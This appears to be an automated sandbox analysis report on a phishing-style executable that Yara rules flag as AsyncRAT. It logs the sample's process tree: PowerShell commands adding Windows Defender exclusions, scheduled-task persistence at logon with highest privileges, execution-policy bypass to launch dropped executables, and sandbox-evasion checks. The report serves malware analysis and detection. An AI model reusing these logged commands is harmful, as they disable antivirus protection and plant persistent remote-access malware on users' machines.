Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\jzhlgt.exe "C:\Users\user\AppData\Local\Temp\jzhlgt.exe"
Source: C:\Users\user\AppData\Local\Temp\jzhlgt.exe | Process created: C:\Users\user\AppData\Local\Temp\jzhlgt.exe C:\Users\user\AppData\Local\Temp\jzhlgt.exe
Source: C:\Users\user\AppData\Local\Temp\jzhlgt.exe | Process created: C:\Users\user\AppData\Local\Temp\jzhlgt.exe C:\Users\user\AppData\Local\Temp\jzhlgt.exe
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\dlliok.exe "C:\Users\user\AppData\Local\Temp\dlliok.exe"
Source: C:\Users\user\AppData\Local\Temp\dlliok.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pLrWNKFD.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dlliok.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pLrWNKFD" /XML "C:\Users\user\AppData\Local\Temp\tmp9C7F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dlliok.exe | Process created: C:\Users\user\AppData\Local\Temp\dlliok.exe C:\Users\user\AppData\Local\Temp\dlliok.exe
Source: C:\Users\user\AppData\Local\Temp\dlliok.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpAD4.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\dlliok.exe C:\Users\user\AppData\Local\Temp\dlliok.exe 0
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe "C:\Users\user\AppData\Local\Temp\mozille.exe"
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | File created: C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | File created: C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@53/16@0/1
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | Binary or memory string: INSERT INTO [content] ([active], [activate], [expire], [dayparts], [contentType], [descriptor], [size], [viewcount], [viewlimit], [displayafter], [props], [data]) VALUES (@active, @activate, @expire, @dayparts, @contentType, @descriptor, @size, @viewcount, @viewlimit, @displayafter, @props, @data); SELECT last_insert_rowid() AS contentId;
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.1.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.RFQ_GGMC-Ref 12-01-2022.exe.160000.0.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.2.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: IDescriptionMetadataEnt.pdb source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp

Data Obfuscation:

Yara detected Costura Assembly Loader
Source: Yara match File source: 00000015.00000002.582533114.0000000007400000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.571994209.00000000031E3000.00000004.00000001.sdmp, type: MEMORY
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"'
.NET source code contains potential unpacker
Source: RFQ_GGMC-Ref 12-01-2022.exe, sO/j4.cs .Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, sO/j4.cs .Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, sO/j4.cs .Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.1.unpack, sO/j4.cs .Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.RFQ_GGMC-Ref 12-01-2022.exe.160000.0.unpack, sO/j4.cs .Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.2.unpack, sO/j4.cs .Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: RFQ_GGMC-Ref 12-01-2022.exe, WXX/jXQ.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.1.unpack, WXX/jXQ.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.2.RFQ_GGMC-Ref 12-01-2022.exe.160000.0.unpack, WXX/jXQ.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.2.unpack, WXX/jXQ.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe Code function: 0_2_00A3C910 pushad ; retf
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe Code function: 0_2_00A3F572 pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\mozille.exe Code function: 14_2_00C1C910 pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\mozille.exe Code function: 14_2_00C1F572 pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\mozille.exe Code function: 14_2_04F84E40 push esp; retf
Source: C:\Users\user\AppData\Local\Temp\mozille.exe Code function: 14_2_04F81778 push eax; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\mozille.exe Code function: 14_2_04F81768 push eax; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\mozille.exe Code function: 15_2_01A0C910 pushad ; retf
Source: initial sample Static PE information: section name: .text entropy: 7.64899477975 (2 identical entries)
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe File created: C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe File created: C:\Users\user\AppData\Local\Temp\mozille.exe

Boot Survival:

Yara detected AsyncRAT
Source: Yara match File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe Process information set: NOOPENFILEERRORBOX (46 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (98 identical entries)
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  Yara detected AntiVM3
                  Source: Yara match | File source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.mozille.exe.33325b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001B.00000002.492375897.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.538688651.00000000033B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: mozille.exe PID: 6564, type: MEMORYSTR
                  Yara detected AsyncRAT
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe TID: 3912 | Thread sleep time: -40187s >= -30000s
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe TID: 3732 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5648 | Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe TID: 5848 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe TID: 2220 | Thread sleep time: -35668s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe TID: 6380 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe TID: 4760 | Thread sleep time: -41095s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892 | Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6393
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2721
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5790
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3078
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Thread delayed: delay time: 40187
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Thread delayed: delay time: 35668
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Thread delayed: delay time: 41095
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | File Volume queried: C:\ FullSizeInformation
